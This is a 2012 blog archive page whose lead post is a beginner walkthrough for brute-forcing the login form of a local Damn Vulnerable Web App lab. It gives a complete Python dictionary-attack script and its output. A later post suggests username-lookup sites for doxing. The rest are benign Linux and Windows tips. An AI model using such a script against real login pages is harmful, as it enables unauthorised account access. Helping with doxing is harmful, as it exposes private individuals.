Thursday, 2 February 2012

Brute Force Vulnerability - Damn Vulnerable Web App Part 1

Welcome to the part 1 of the web hacking series based on damn vulnerable web application. I will be guiding all the beginners through the various web hacking technologies by using the open source DVWA application. I would like to suggest to try things on your own before reading all of these tutorials and you could actually use these series of tutorial as walkthroughs.

By now, I suppose you have already installed the damn vulnerable web application in your local web server(or maybe in local area network). Login to the DVWA interface with the default username/password combination which is admin:password Also we will first start with the low security level that can be set from within the interface by clicking on "DVWA security" link. So please set the security level as low and make sure you have not enabled PHPIDS for now.

In this very first tutorial, I will be guiding you in bruteforcing the login form which you can access from the "Brute Force" item in the left navigation menu.

*** For some reason, code looks ugly but copy/paste will work perfectly. ***

A bit of information on bruteforce: Bruteforce is a trial and hit method used to enumerate the working set of candidates for any system. In computer security field, bruteforcing is generally used to determine the authentication credentials by either making extensive guess using the permutation and combination methods(pure bruteforce) or by making use of dictionary(called dictionary attack). Usually, one of the keys is run through the same algorithm that has been employed in the system and the keys are tested on the system's authentication mechanism to determine the correct set of combinations. In our example, we will be performing dictionary attack on the web based form authentication system.

1) Lets test the login form with a random login information(I will test with admin:admin combination). And on giving wrong credentials, the login system shows us the error Username and/or password incorrect.. And we can see the URL in address bar changes to http://localhost/pvt/dvwa/vulnerabilities/brute/?username=admin&password=admin&Login=Login#. The URL suggests us that form is using the GET method and hence our credentials are being part of querystring on the URL.

2) Manual bruteforcing might take a lot longer time than expected so its a good idea to write a form bruteforcer. Of course, there are several tools on the internet for form bruteforcing but we will write our own tool in python programming language. Writing a bruteforcer is not a very difficult task but I expect you know one of the programming languages. If not, I suggest you to grab the basics of at least one language among PHP, Python, PERL and Ruby. Our attack will actually be a dictionary attack, a variant of bruteforcing technique in which we will be testing several user:password combination to find if any of those combinations work.

3) I hope you have already learnt basics of one of the above said languages. Now lets create list of possible usernames and list of possible passwords. You might write these two lists separately in two files for big list but for now I'll be putting possible usernames and passwords as tuple in the python code itself.

users = ("admin", "administrator", "1337")
passwords = ("admin", "administrator", "hacker", "password", "jessica", "qwerty", "iloveyou", "123456", "1337", "leet", "john", "stephen", "charley")

4) Now we will use urllib2 python module to send the HTTP requests with our username:password combinations. So first lets create the URL we will make request with. We have earlier found that login information is being passed as the GET parameters so things will be little bit easier. We can directly craft the action URL using our combinations which will look as below:

for user in users:
    for password in passwords:
        url = "http://localhost/pvt/dvwa/vulnerabilities/brute/?username=%s&password=%s&Login=Login" %(user, password)

5) Now that we have successfully crafted the URL, we will have to add cookies to the request header. This can be easily done by using urllib2 module. We need to put cookies to reflect our logged-in status to the DVWA interface otherwise we will be redirected to the login page of DVWA itself. We can grab our cookies from the browser. I used "View Cookie Information" feature of "Web Developer" plugin I had installed in my firefox browser. The two cookie fields were PHPSESSID and security. So our code becomes:

for user in users:
    for password in passwords:
        url = "http://localhost/pvt/dvwa/vulnerabilities/brute/?username=%s&password=%s&Login=Login" %(user, password)
        req = urllib2.Request(url)
        req.add_header("Cookie", "PHPSESSID=sdenfruj4kh1o8miaj443taul1;security=low")
        response = urllib2.urlopen(req)
        html = response.read()

6) Now we have successfully read the HTML response, we will just make use of the information we had earlier when our credentials were wrong. What I mean is that providing wrong credentials was throwing us an error Username and/or password incorrect. in the HTML output. Hence, we can search for this string and if this string is not present in the HTML output, we can be sure that our current username:password combination is working. Hence our final code becomes:
#!/usr/bin/python

import urllib2

users = ("admin", "administrator", "1337")
passwords = ("admin", "administrator", "hacker", "password", "jessica", "qwerty", "iloveyou", "123456", "1337", "leet", "john", "stephen", "charley")

for user in users:
    for password in passwords:
        url = "http://localhost/pvt/dvwa/vulnerabilities/brute/?username=%s&password=%s&Login=Login" %(user, password)
        req = urllib2.Request(url)
        req.add_header("Cookie", "PHPSESSID=sdenfruj4kh1o8miaj443taul1;security=low")
        response = urllib2.urlopen(req)
        html = response.read()
        if "Username and/or password incorrect." not in html:
            print "Working combination --- %s : %s" %(user, password)

7) Now lets run this code from terminal by typing python bruteforce.py and following was the result:

samar@Techgaun:~/Desktop$ python bruteforce.py
Working combination --- admin : password
Working combination --- 1337 : charley
samar@Techgaun:~/Desktop$

8) Lets see if our extracted combinations really work in the website. And voila!!! They work like a charm. This was just a very basic example on how you could bruteforce the HTTP forms and perform dictionary attack. I hope you learnt basic of bruteforcing from this tutorial.



Read more...

Saturday, 28 January 2012

KDE Version 4.8 Is Released With Updated Plasma Workspaces, Apps n Platforms

On 25th January 2012, KDE has released 4.8.0, containing compelling new features and improvements to the Plasma Workspaces, the KDE Applications and the KDE Development Platform. Version 4.8 is intended to provide many new features, and improved stability and performance.




Major KDE improvements in this version are:
Adaptive Power Management - Kwin optimizations, the redesign of power management, and integration with Activities.

Faster, More Scalable File Management - KDE v. 4.8 includes Dolphin with its new display engine, new Kate features and improvements, Gwenview with functional and visual improvements.

Enhanced Interoperability & Introduction of Touch-Friendly Components

Check the official announcement


Read more...

Sunday, 22 January 2012

Useful Sites To Mass Check Availability Of Username In Many Social Networking Sites

Sorry for not posting for long time. This sinusitis is killing my cells. Anyway I thought to share two useful websites that can be used to check the availability of the username in numerous social networking sites at once.

Two websites that allow checking availability of username and vanity URL are:

a) Namechk.com

b) Knowem.com

These two websites will perform mass lookup for the presence of given username in hundreds of social networking and social bookmarking websites. Also, the above provided links can be used in the process of doxing(Doxing is a technique of tracing someone or gather information about an individual using sources on the internet. - from urbandictionary).


Read more...

Tuesday, 17 January 2012

Watch ASCII Star Wars Through Telnet

Just thought to share this cool link that features a star wars in the telnet. Telnet to the remote server and you'll be shown the star wars story.

Open your terminal and type the following:

telnet towel.blinkenlights.nl


And, the online web version is available at HERE


Read more...

Monday, 16 January 2012

Things I Use CLI Rather Than GUI For

Today I am sharing the things I do not use or do not like to use graphical user interface(GUI) instead I stick to command line. I use the following commands instead of their graphical counterpart as the command line way is faster and easier.


1) Combine MP3 files(songs)
I frequently combine mp3 files into a single one to hear what I record in my laptop. The cat command is enough to combine two or more MP3 files into a single one. Below is a sample command:

cat input1.mp3 input2.mp3 > output.mp3

2) Monitor Memory Usage
I usually find myself typing top command in the terminal instead of opening system monitor when I need to see what is clogging up my CPU. I also use powertop command to view power consumption of my laptop so that I can get suggestions to increase the battery life.

3) Resize images
This is another thing I use command line instead of GUI, for. I find using the mogrify and convert commands from imagemagick packages easier than graphical interface esp. when I need to batch resize the images to a specified size. Please refer to my blog post in these commands.

4) Video Conversion Using ffmpeg
I frequently convert the videos using the commandline ffmpeg utility. The general syntax is quite easier to remember. An example below will clarify things.

ffmpeg -i inputvideo.mp4 outputvideo.avi

Play with different video formats as per your requirement.

5) Edit Text Files
I usually find myself opening nano editor while editing the text files. Of course, using the lightweight GUI tools like gedit would be more easier and reliable. However, maybe due to the fact that I work a lot of times over SSh, I find using nano to edit textual files.

nano file.txt

6) Install Softwares and Perform Updates and Upgrades
Whenever I need to install a software, or perform updates and upgrades, I am used to with the command line apt-get utility.

Install a software package
sudo apt-get install package1 package2 ... packagen

Perform release upgrade
sudo do-release-upgrade

7) Mirror A Website
Mirroring a website is a lot easier with wget command and I frequently use this. The simplest form is as below but be sure to check the MAN page and help for wget command to know more options available.

wget -mk -w 4 http://www.site.com/

In the above example, m means mirror and k refers to local hyperlinking and w is for maintaing proper delay time so that the remote server does not get overloaded.

So these are some of the stuffs I like to do using command line rather than GUI. Share yours...


Read more...

Sunday, 15 January 2012

Converting PDF Files To Text Or HTML From Linux Terminal

Earlier, we saw how we can merge or combine PDF files from terminal. Now, I am sharing two command line tools to convert PDF files to text or html files.

Poppler Utils is a great package of PDF rendering and conversion tools and should be installed before we convert PDF files to text or html files. You can install the poppler-utils issuing the following command in debian based distro. You can install them in your favorite distros using their corresponding package installers.

sudo apt-get install poppler-utils

Now that poppler-utils is installed, we will be able to convert PDF files to text and HTML using pdftotext and pdftohtml command-line tools.

PDF to Text


To convert a PDF files to text, we should use pdftotext command. Following is the simplest form of the command for converting a PDF file to text file.

pdftotext file.pdf file.txt

This command also allows you to preserve the original layout in the pdf file using the -layout switch as below:

pdftotext -layout file.pdf file.txt

Similarly, if you wish to convert pages of specific range, you can use -f and -l switches to specify the first and last page to convert to text file. An example below would clarify things where I've choosen to convert pages from 4 to 8 into text.

pdftotext -f 4 -l 8 file.pdf file.txt

Check the man page of pdftotext and also see the help for the tool to explore other options as well.

PDF to HTML


To convert a PDF file to HTML file, you can use the pdftohtml tool available in the poppler package. Before that, I will show how to use pdftotext command to convert the PDF file to HTML file.

pdftotext -f 4 -l 8 -htmlmeta file.pdf file.html

Now, using the pdftohtml tool is not that different than pdftotext. A simplest form would be as below:

pdftohtml file.pdf file.html

You can use the same arguments as in the pdftotext for this tool as well for specifying the range. However, -htmlmeta and -layout are only available in pdftotext. I would let you explore more on the pdftohtml tool.

I hope this information is useful for you. :)

Read more...

Merge/Combine PDF Documents In Linux From Terminal

Hi everybody, I was inactive for a while due to some health problems(chronic sinusitis, to be specific) and would like to apologize for not writing. This time, I am writing about how you can easily combine pdf files into a single pdf file using a linux terminal.

pdftk is a small but powerful handy PDF manipulation tool with many useful features to work with PDF files. The MAN page for pdftk says, "If PDF is electronic paper, then pdftk is an electronic staple-remover, hole-punch, binder, secret-decoder-ring, and X-Ray-glasses. Pdftk is a simple tool for doing everyday things with PDF documents."
You can use it to:

* Merge PDF Documents or Collate PDF Page Scans
* Split PDF Pages into a New Document
* Rotate PDF Documents or Pages
* Decrypt Input as Necessary (Password Required)
* Encrypt Output as Desired
* Fill PDF Forms with X/FDF Data and/or Flatten Forms
* Generate FDF Data Stencils from PDF Forms
* Apply a Background Watermark or a Foreground Stamp
* Report PDF Metrics such as Metadata and Bookmarks
* Update PDF Metadata
* Attach Files to PDF Pages or the PDF Document
* Unpack PDF Attachments
* Burst a PDF Document into Single Pages
* Uncompress and Re-Compress Page Streams
* Repair Corrupted PDF (Where Possible)

Today I'll show you how to combine or merge two or more pdf documents to a single PDF document using this tool. Navigate to the folder containing the PDFs you want to merge and then type the following command:

pdftk *.pdf cat output outputfile.pdf

The above command will take the PDF files in the alphabetical order and if you want to have your own order of the PDFs, say for an example, I have two PDFs a.pdf and b.pdf and I want pages from b.pdf to appear before a.pdf then I would simply do:

pdftk b.pdf a.pdf cat output outputfile.pdf

The pdftk is not limited to this simple merging method only, it has very powerful capabilities for merging documents. Below is an example of how I merged page 1-5 of first pdf and 10-15 of another pdf.

pdftk A=a.pdf B=b.pdf cat A1-5 B10-15 output outputfile.pdf

Below example shows how I can merge even pages from first pdf and odd pages from second pdf.

pdftk A=a.pdf B=b.pdf cat Aeven Bodd output outputfile.pdf

You can make numerous other variations and looking the MAN page for pdftk would be a good idea to explore more options. So why would we need heavy graphics based PDF editor when things can be done by a small commandline utility like pdftk.

I hope this post is useful to you. :)


Read more...

Saturday, 31 December 2011

Details On The CON Issue In Windows

We can not create a folder with its name as "Con" in windows and many people are unaware of this fact and the reason behind this. So I am here to clarify everything about the CON issue in windows. I will also discuss about the way to create such folders in windows.

If you haven't tried yet, try creating the folder with the name con and you will find that the folder can not be renamed to con. This is not the only name that shows such unique behavior. Other such names that can not be the name of folders are CON, PRN, AUX, CLOCK$, NUL, COM0, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT0, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9(list taken from Wikipedia).

These words are the reserved words and date back to old MS-DOS days. These names were reserved for MS-DOS device files and hence to prevent any kind of ambiguity, these names are not allowed for normal files and folders.

But there's way. Now comes the role of Universal Naming Convention(or Uniform Naming Convention) commonly known as UNC which specifies a common syntax to describe the location of a network resource, such as a shared file, directory, or printer.

The UNC syntax for windows system is as below:

\\ComputerName\SharedFolder\Resource

You can read about UNC in the wikipedia entry.

UNC was introduced after the introduction of MS-DOS so MS-DOS systems do not understand the UNC naming i.e. it is not backward compatible to MS-DOS. That said, we can create folders with special names in our local system using the UNC syntax. The single dot (.) is used to indicate the local system as per the UNC definition.

Now to create a folder with any of the reserved words, we will use mkdir command. For example, to create a CON folder in my friend's laptop's Desktop folder, I typed the following command in the command prompt.

mkdir \\.\C:\Users\suman\Desktop\con

This creates a con folder in our desktop. Now try to delete it using GUI or from command prompt by issuing rmdir con command. It will give you an error. So to delete the folder, you can use the same UNC syntax as below:

rmdir \\.\C:\Users\suman\Desktop\con

On issuing this command, your con folder should be gone. You can try the same with the other reserved file names. Also, check the following screenshots for clarity.




Some of you might think Whats the use of all this stuff?: I don't know if there's any serious use of this stuff but its kinda cool to know these kind of stuffs for tech-freaks. If there can be any good use of this trick, please share over here. I hope this stuff is useful. Happy New Year 2012 :)


Read more...